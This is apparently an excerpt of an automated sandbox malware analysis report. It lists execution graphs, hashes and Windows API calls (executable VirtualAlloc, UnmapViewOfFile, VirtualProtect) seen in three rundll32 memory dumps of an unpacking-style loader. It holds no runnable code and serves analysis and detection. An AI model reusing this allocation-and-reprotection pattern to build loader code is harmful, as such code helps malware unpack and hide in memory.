                                                                        • Instruction ID: 8a0e2f16d3e2f68090e21e5e7611a51a1228c9cb88d0a34e35e9d00eb20a6ec8
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: 8D113060D08289EEEF01D7E8880A7EFBFB55B21704F044098D6446A282D3BA57598BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1072 1a08d0 1073 1a08ed 1072->1073 1078 19ff50 1073->1078 1075 1a097c 1081 1a0530 VirtualAlloc 1075->1081 1077 1a09b3 1079 19ff91 1078->1079 1080 19ffc4 VirtualAlloc 1079->1080 1080->1075 1082 1a058e 1081->1082 1083 1a0615 UnmapViewOfFile VirtualAlloc 1082->1083 1084 1a0650 1083->1084 1085 1a077d 1084->1085 1086 1a0752 VirtualProtect 1084->1086 1085->1077 1086->1084 1087 1a0070 1088 19ff50 VirtualAlloc 1087->1088 1089 1a007d 1088->1089

                                                                        Executed Functions

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001A0575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 001A0625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001A063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001A0770
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.2208013458.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_180000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction ID: 336a9459a41ae7e1f47b105f39a715a65b8de83f11da04df203158351b00b5fc
                                                                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction Fuzzy Hash: F7B19A78E00109DFCB48CF84C591AAEB7B5BF88314F248159E919AB355D735EE82CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 39 19ff50-19ff9b call 1a0360 42 19ffaa-19ffda call 19fd30 VirtualAlloc 39->42 43 19ff9d-19ffa7 call 1a0360 39->43 43->42
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019FFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.2208013458.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_180000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction ID: de335e17235b09190b637927304141649476f6793a9ad5fd71d5d0809f082e2f
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: A4113060D08289EEEF01D7E888097EFBFB55F21704F044098D6446A282D3BA57598BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1072 2108d0 1073 2108ed 1072->1073 1078 20ff50 1073->1078 1075 21097c 1081 210530 VirtualAlloc 1075->1081 1077 2109b3 1079 20ff91 1078->1079 1080 20ffc4 VirtualAlloc 1079->1080 1080->1075 1082 21058e 1081->1082 1083 210615 UnmapViewOfFile VirtualAlloc 1082->1083 1084 210650 1083->1084 1085 21077d 1084->1085 1086 210752 VirtualProtect 1084->1086 1085->1077 1086->1084 1087 210070 1088 20ff50 VirtualAlloc 1087->1088 1089 21007d 1088->1089

                                                                        Executed Functions

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00210575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 00210625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0021063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00210770
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.2217789579.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1f0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction ID: 12da7ea77053d9a4454a67c47f97abb959356eab343d44c8e8639802e2d4a6cd
                                                                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction Fuzzy Hash: A5B198B4E00109DFCB48CF94C591AAEB7B5BF98304F208159E919AB345D775EE92CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 39 20ff50-20ff9b call 210360 42 20ffaa-20ffda call 20fd30 VirtualAlloc 39->42 43 20ff9d-20ffa7 call 210360 39->43 43->42
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0020FFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.2217789579.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1f0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction ID: 83315a3cf3cf2dacbed528e6ed80a8dc6b12b11bad318e9238a6ee6467b7b864
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: FA113060D08389DEEB01D7E884097EFBFB55B21704F044098E6446A282D2BA57588BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Executed Functions

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00220575
                                                                        • UnmapViewOfFile.KERNEL32(?), ref: 00220625
                                                                        • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 0022063F
                                                                        • VirtualProtect.KERNEL32(?,?,00000000), ref: 00220770
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.2336979891.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_200000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction ID: 00e88c1117e0c3b4ceee0d213066e79126017e98e7d40dcd939e9d18aeab0a39
                                                                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction Fuzzy Hash: 09B19A74E00109AFCB48CF84D591AAEB7B5BF88304F208159E919AB356D735EE92CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 39 21ff50-21ff9b call 220360 42 21ffaa-21ffda call 21fd30 VirtualAlloc 39->42 43 21ff9d-21ffa7 call 220360 39->43 43->42
                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0021FFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.2336979891.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_200000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction ID: 30e7e9b02bc970f5c3576ad605b9d45b37784b2eb180760db78a940ab82c0233
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: C0113060D08289EEEB01D7E894097EFBFB55B21704F044098D6446A282D2BA57588BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions